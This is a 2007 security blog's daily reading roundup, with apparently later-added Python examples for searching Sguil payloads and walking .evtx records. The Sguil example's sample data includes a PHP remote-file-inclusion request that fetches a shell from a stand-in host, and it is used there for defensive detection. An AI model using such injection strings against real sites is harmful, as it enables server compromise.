Category: Suggested Blog Reading

Suggested Blog Reading – Friday July 13th, 2007

It’s Friday the 13th…cue ominous music…but I’m counting on everything going smoothly today. Is it just me, or do things always tend to explode on Fridays?

Here’s the list:

Oracle UK systems accused in ‘SSH hacking spree’ – “Bad Oracle….bad!”

Compromised computers at Oracle UK are listed among the 10 worst offenders on the net for launching attacks on servers which run SSH (secure shell) server software.

Oracle said it is investigating the reported problem, which it is yet to either confirm or refute.

A box (or group of boxes behind a proxy) at Oracle UK is among the worst offenders for launching attacks, according to statistics from servers running DenyHosts software to block SSH brute-force password attacks.

Patching an IPS – 16 months ! – Woah…..

Looking into the disclosure timeline [pdf] by Andres Riancho of Cybsec Security Systems, the vendor was contacted on 6th February 2006 already.

The updated TOS version was released on 4th July, 2007, i.e. last week.

I’m not saying 3Com is slow when fixing vulnerabilities; I think this issue was extremely difficult to resolve. Cybsec will “disclose technical details 30 days after publication of pre-advisory”. Let’s wait!

FG-Injector – SQL Injection & Proxy Tool – New tool to test out.

FG-Injector Framework is a set of tools designed to help find SQL injection vulnerabilities in web applications, and help the analyst assess their severity. It includes a powerful proxy feature for intercepting and modifying HTTP requests, and an inference engine for automating SQL injection exploitation.

NIST releases revised FIPS crypto standard for review – Review away my friends….review away!

The latest version of the Federal Information Processing Standard for cryptographic modules, FIPS 140-3, has been released for comment by the National Institute of Standards and Technology.

Comments on the draft, available online at http://csrc.nist.gov/publications/drafts.html#fips140-3 , are due to NIST by Oct. 11.

The current standard, FIPS 140-2, grew out of Federal Standard 1027, General Security Requirements for Equipment, which used the now-outdated Data Encryption Standard. FIPS 140-1 was issued in 1994 with a requirement that it be reviewed every five years. The review and revision process can take several years, and FIPS 140-2 was approved in 2001.

Suggested Blog Reading – Thursday July 12th, 2007

It’s Thursday…one day between me and my precious weekend.

Here’s the list:

Webinar: Cross-Site Request Forgery – Free webinar if you’re interested.

For those interested in learning about Cross-Site Request Forgery (CSRF), WhiteHat is hosting a webinar on July 24, 2007 at 11:00 AM PDT. This is about the basics, ins and outs, and solutions in straightforward terms. If you want to attend, registration is free.

Secret Military Materials Posted to Unprotected Public Servers – This has “good idea” written all over it.

In the latest government scandal that may make you drop your head in your hands and groan, the Feds have accidentally posted critical information to unsecured public FTP servers — critical as in blueprints, aerial photographs, and geographical surveys that could show Iraqi insurgents entry points and weaknesses at key military sites. The Associated Press published their report this afternoon.
The military may know something about secrecy in the trenches, but next to nothing about security on the Internet. They initially refused to release the information, and then unwittingly posted it online, according to AP:

The military calls it “need-to-know” information that would pose a direct threat to U.S. troops if it were to fall into the hands of terrorists. It’s material so sensitive that officials refused to release the documents when asked.

But it’s already out there, posted carelessly to file servers by government agencies and contractors, accessible to anyone with an Internet connection.

Snort Report 7 Posted – Richard has posted his 7th Snort report. These are always a good read for anyone who uses Snort.

In the last Snort Report we looked at output methods for Snort. These included several ways to write data directly to disk, along with techniques for sending alerts via Syslog and even performing direct database inserts. I recommended not configuring Snort to log directly to a database because Snort is prone to drop packets while performing database inserts. In this edition of the Snort Report I demonstrate how to use unified output, the preferred method for high performance Snort operation.

Fun Intrusion Story – “Major network penetrations of any kind are exceedingly uncommon.” …. HAHAHAHAHAHAH.

Here is an enlightening account of a major intrusion investigation of a cell phone network in Greece.

Tina Bird’s Logs and Law Summary – Good reference material.

Here is the most comprehensive summary of all legal, regulatory, policy and other guidance documents that mention logging, created and maintained by none other than Tina Bird, who seems to be back in logland full time 🙂

Do-It-Yourself Forensics – Exceptionally good article from a legal publication.

All over America, vendors stand ready to solve the e-discovery problems of big, rich companies. But here’s the rub: Most American businesses are small companies that use computers — and along with individual litigants, they’re bound by the same preservation obligations as the Fortune 500, including occasionally needing to preserve forensically significant information on computer hard drives. But what if there’s simply no money to hire an expert, or your client insists that its own IT people must do the job?

Misplaced Class Roster Contained Student Social Security Numbers – Wow….just…..wow.

For the second time in as many months, Texas A&M, Corpus Christi is alerting students over the loss of personal information. This latest incident involved the temporary loss of a class roster containing the names and Social Security numbers of the 49 individuals enrolled in A&M-CC’s Business Law 3310 class. The adjunct professor for the class, Terrell Dahlman, immediately notified School of Business officials and class students when he discovered the roster missing. In an e-mail to students, Dahlman asked each student to check their handouts to see if they accidentally picked up the roster. A student, it turns out, did accidentally pick up the roster and returned the roster to Dahlman during the next class. According to Marshall Collins, vice president for marketing and communications, A&M-CC will not investigate this incident further since the roster was returned. When asked about A&M-CC using Social Security numbers for identification, Collins replied, “All we have to go by is Social Security numbers. It’s one of the fallacies of the system.”

Suggested Blog Reading – Wednesday July 11th, 2007

Busy, busy, busy. If only I had more time during the day.

Here’s the list:

Searching inside payload data – Good little SQL statement to hang on to.

Almost all of my searches involve IPs and/or port numbers, and Sguil has a lot of built-in support for these types of database queries, making them very easy to deal with. Sometimes, though, you want to search on something a little more difficult.

This morning, for example, I had a specific URL that was used in some PHP injection attack attempts, and I wanted to find only those alerts that had that URL as part of their data payload.

Constructing a query for this is actually pretty easy, if you use the HEX() and the CONCAT() SQL functions. If you’re using the GUI interface, you only have to construct the WHERE clause, so you can do something like the following…
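The excerpt above describes the idea (hex-encode the search string with HEX() and wrap it in wildcards with CONCAT() so it can be matched against Sguil’s hex-encoded payload column) but the post’s actual WHERE clause is not reproduced on this page. The following is an added example, not the original post’s code or anything shipped with Sguil: it builds a small in-memory SQLite table shaped like Sguil’s `data` table (the column name `data_payload` and the upper-case hex storage format are assumptions about that schema), registers a CONCAT() function so the clause reads as it would in MySQL, runs the search over constructed payloads, and then shows a caveat a practitioner should know: a LIKE match on hex text can straddle a nibble boundary and hit bytes that do not actually contain the search string, so the hit is confirmed on the decoded bytes.

```python
import binascii
import sqlite3

# Constructed sample payloads keyed by Sguil's cid (event id). Record 4 is the
# same URL in a different letter case; record 5 contains byte 0x14 followed by
# 0x14 0x20, whose hex "141420" contains "4142" = HEX('AB') across a nibble
# boundary even though the bytes "AB" never occur.
SAMPLE_PAYLOADS = {
    1: b"GET /index.php?page=http://evil.example/shell.txt? HTTP/1.1\r\nHost: victim\r\n",
    2: b"GET /index.php?page=about HTTP/1.1\r\nHost: victim\r\n",
    3: b"POST /login HTTP/1.1\r\nHost: victim\r\n\r\nuser=bob&pass=x",
    4: b"GET /x.php?inc=HTTP://EVIL.EXAMPLE/shell.txt HTTP/1.1\r\n",
    5: b"\x14\x14 binary junk \x00\x01",
}

# The clause under test: the WHERE part is what a Sguil GUI user would type;
# the search string is bound as a parameter rather than pasted as a literal.
PAYLOAD_QUERY = (
    "SELECT cid, data_payload FROM data "
    "WHERE data.data_payload LIKE CONCAT('%', HEX(?), '%') ORDER BY cid"
)


def build_db():
    """Create an in-memory table mimicking Sguil's data table (assumed layout)."""
    conn = sqlite3.connect(":memory:")
    # MySQL has CONCAT(); SQLite only has ||, so register an equivalent.
    conn.create_function("CONCAT", -1, lambda *parts: "".join(parts))
    conn.execute("CREATE TABLE data (sid INTEGER, cid INTEGER, data_payload TEXT)")
    for cid, raw in SAMPLE_PAYLOADS.items():
        # Sguil stores the payload as an upper-case hex string (assumption).
        conn.execute("INSERT INTO data VALUES (?, ?, ?)",
                     (1, cid, binascii.hexlify(raw).decode().upper()))
    conn.commit()
    return conn


def find_cids(conn, needle):
    """Event ids whose hex payload contains HEX(needle), exactly as LIKE sees it."""
    return [cid for cid, _ in conn.execute(PAYLOAD_QUERY, (needle,))]


def find_cids_aligned(conn, needle):
    """Same query, but confirm each hit on the decoded bytes so that a match
    that straddles a nibble boundary (a false positive) is rejected."""
    raw_needle = needle.encode()
    hits = []
    for cid, hex_payload in conn.execute(PAYLOAD_QUERY, (needle,)):
        if raw_needle in binascii.unhexlify(hex_payload):
            hits.append(cid)
    return hits


if __name__ == "__main__":
    db = build_db()
    url = "http://evil.example/shell.txt"
    print("URL hits (byte-exact, so the upper-case variant in cid 4 is missed):",
          find_cids(db, url))
    print("LIKE-only hits for 'AB':", find_cids(db, "AB"))
    print("Confirmed hits for 'AB':", find_cids_aligned(db, "AB"))
```

Two things worth keeping in mind when using this trick on a real Sguil database: HEX() is byte-exact, so a URL injected with different letter casing (or URL-encoded) is a different hex string and will not match, and the wildcard LIKE on hex text is a substring match on characters, not bytes, so an occasional hit will decode to bytes that do not contain your string at all. The confirmation step above costs one decode per candidate row and removes that class of false positive.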

Explaining Sensitive Information – Unfortunately there is no definitive method for classifying sensitive information. Which begs the question…shouldn’t there be?

Classification of data starts with defining that data. Unfortunately there are many definitions for personal or private information and these definitions are often different depending on country, state, organization, regulation, and other factors.

Network Security Monitoring Case Study – I love case studies!

So this is the major question. How do you convince management or other functional areas that monitoring is important? It sounds to me like my friend has already scored some wins by freeing bandwidth used by misconfigured systems, simplifying firewall rules, and examining individual problematic hosts.

It’s important to remember that there is no return on security investment. Security is a cost center that exists to prevent or reduce loss. It is not financially correct to believe you are “earning” a “return” by spending time and money to avoid a loss.

If I need to spend $1000 to hire a guard to protect my $10000 taxi, I am not earning a return on my investment — I am preventing the theft of my taxi. If I invest that $1000 in a ticketing and GPS system that makes me more productive ferrying passengers (perhaps increasing my dollars per hour worked), then I have enjoyed a ROI once my $1000 expense is covered.

Breach vs. Incident: Semantics or Something More? – Personally, I tend to think that a “breach” is an intrusion outside of policy whereas an “incident” would be the proceeding results of the aforementioned breach (attack a server, obtain sensitive documents, etc.).

What I find so fascinating about this statement is the distinction between incident and breach, and that an “incident” should not be viewed in the same light as a “breach”. So I started thinking: is this distinction merely a semantic issue, or are there some underlying assumptions amongst the general public that an incident is an everyday, and perhaps less dangerous, occurrence than a breach? One of the words is a simple noun that brings to mind a singular event of some type that may or may not be harmful. The other word is more action oriented and brings to mind, at least to my mind, images of whales bursting through the surface of the water and other dynamic events. Given the differences in these words, should they be used as interchangeably as they are in the Information Security arena?

Evtx Event Record – Interesting.

This article documents the structure of a single event record within a Vista Event Log (.evtx) file.

The event record starts with a magic string, two asterisks followed by two null bytes. It is framed by matching length indications. They state the whole record’s size, from the magic string to the trailing length indicator. This is similar to the record structure of the old NT event logging service. The length indications at the beginning and at the end of an event record allow the logging service to traverse the chain of records efficiently in both directions.
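To make the framing described above concrete, here is an added example (not code from the article being quoted) that builds a chain of records with exactly that framing, the `**\0\0` magic, a leading 4-byte size, the record content, and a trailing copy of the size, and then walks the chain in both directions using only the length fields, which is the property the excerpt highlights. The size fields are treated as little-endian unsigned 32-bit integers; the record identifier, timestamp and BinXml fields of a real .evtx record are not modelled and are folded into an opaque body, so this is a sketch of the framing, not a full event record parser. It also shows what a walker has to do when the leading and trailing sizes disagree, which is how a truncated or damaged record is detected.

```python
import struct

MAGIC = b"**\x00\x00"            # two asterisks followed by two null bytes
SIZE_FMT = "<I"                   # 4-byte little-endian length field
HEADER_LEN = len(MAGIC) + 4       # magic + leading size
TRAILER_LEN = 4                   # trailing size copy
MIN_RECORD = HEADER_LEN + TRAILER_LEN


def frame_record(body):
    """Frame one record: the size counts everything from the magic to the
    trailing size indicator inclusive, as the excerpt describes."""
    size = MIN_RECORD + len(body)
    return MAGIC + struct.pack(SIZE_FMT, size) + body + struct.pack(SIZE_FMT, size)


def frame_chain(bodies):
    return b"".join(frame_record(b) for b in bodies)


def iter_forward(buf):
    """Walk from the first byte, hopping by the leading size. Yields
    (offset, size, body); raises ValueError at the first inconsistent record."""
    off = 0
    while off < len(buf):
        if buf[off:off + 4] != MAGIC:
            raise ValueError(f"no record magic at offset {off}")
        (size,) = struct.unpack_from(SIZE_FMT, buf, off + 4)
        if size < MIN_RECORD or off + size > len(buf):
            raise ValueError(f"implausible size {size} at offset {off}")
        (trailer,) = struct.unpack_from(SIZE_FMT, buf, off + size - TRAILER_LEN)
        if trailer != size:
            raise ValueError(f"leading/trailing size mismatch at offset {off}")
        yield off, size, bytes(buf[off + HEADER_LEN:off + size - TRAILER_LEN])
        off += size


def records_forward(buf):
    return list(iter_forward(buf))


def records_backward(buf):
    """Walk from the last byte, hopping by the trailing size. This is the
    direction the trailing length copy exists for; returns newest first."""
    out, end = [], len(buf)
    while end > 0:
        if end < MIN_RECORD:
            raise ValueError(f"truncated record ending at {end}")
        (size,) = struct.unpack_from(SIZE_FMT, buf, end - TRAILER_LEN)
        start = end - size
        if size < MIN_RECORD or start < 0:
            raise ValueError(f"implausible size {size} ending at {end}")
        if buf[start:start + 4] != MAGIC:
            raise ValueError(f"no record magic at offset {start}")
        (leading,) = struct.unpack_from(SIZE_FMT, buf, start + 4)
        if leading != size:
            raise ValueError(f"leading/trailing size mismatch at offset {start}")
        out.append((start, size, bytes(buf[start + HEADER_LEN:end - TRAILER_LEN])))
        end = start
    return out


def first_bad_offset(buf):
    """Offset of the first record the forward walk rejects, or None if clean.
    Everything before that offset was framed consistently and is recoverable."""
    walked = 0
    try:
        for off, size, _ in iter_forward(buf):
            walked = off + size
    except ValueError:
        return walked
    return None


# Constructed sample chain: three records of sizes 22, 22 and 24 bytes.
SAMPLE_CHAIN = frame_chain([b"record one", b"record two", b"record three"])

# Same chain with record two's trailing size damaged (byte 40 is the low byte
# of that field), simulating a partially overwritten or truncated record.
_damaged = bytearray(SAMPLE_CHAIN)
_damaged[22 + 22 - TRAILER_LEN] ^= 0xFF
CORRUPT_CHAIN = bytes(_damaged)


if __name__ == "__main__":
    for off, size, body in records_forward(SAMPLE_CHAIN):
        print(f"forward  offset={off:3d} size={size:3d} body={body!r}")
    for off, size, body in records_backward(SAMPLE_CHAIN):
        print(f"backward offset={off:3d} size={size:3d} body={body!r}")
    print("first bad record in damaged chain at offset:", first_bad_offset(CORRUPT_CHAIN))
```

For forensic work the useful part is `records_backward`: because the size is repeated at the end, the newest record can be reached from the end of the chunk without reading the whole chunk first, and a damaged record stops the walk at a known offset rather than silently desynchronising everything after it. A real parser would additionally check the record identifiers for continuity and decode the BinXml body, neither of which is attempted here.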

Laptop Containing UMN Student Information Stolen from Locked Car – Sigh…..

The University of Minnesota is alerting students after a laptop containing student grade information was stolen from a professor’s car during a trip to Palo Alto. The laptop, belonging to Elizabeth Beaumont of the political science department, contained the names, e-mail addresses, internal University IDs and grades for students enrolled in Beaumont’s classes from fall 2005 until the present. While the University has a policy that all non-public information must be encrypted, 70-80% of the political science laptops, including Beaumont’s, have no encryption. The University has plans in place to ensure all political science laptops are encrypted by the end of the summer.
